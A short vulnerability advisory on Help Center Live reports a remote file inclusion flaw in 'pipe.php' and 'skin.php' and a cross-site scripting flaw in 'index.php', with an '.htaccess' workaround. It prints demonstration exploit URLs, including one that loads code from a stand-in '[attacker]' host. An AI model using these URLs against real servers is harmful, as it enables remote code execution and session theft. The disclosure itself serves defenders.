Description:
Several vulnerabilities were reported in Help Center Live. A remote user can execute arbitrary commands on the target system. A remote user can also conduct cross-site scripting attacks.
James Bercegay of the GulfTech Security Research Team reported that a remote user can send a specially crafted 'HCL_path' parameter to the 'pipe.php' script to cause the script to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/inc/pipe.php?HCL_path=http://[attacker]
A similar flaw is reported in 'skin.php'.
It is also reported that the 'index.php' script does not properly validate user-supplied input in the 'find' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Help Center Live software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit URL is of the following form:
http://[target]/faq/index.php?find=[CODEGOESHERE]&search=Search

Solution:
No solution was available at the time of this entry.
The report indicates that, as a workaround, you can configure a '.htaccess' file deny access to the '/inc/' directory.
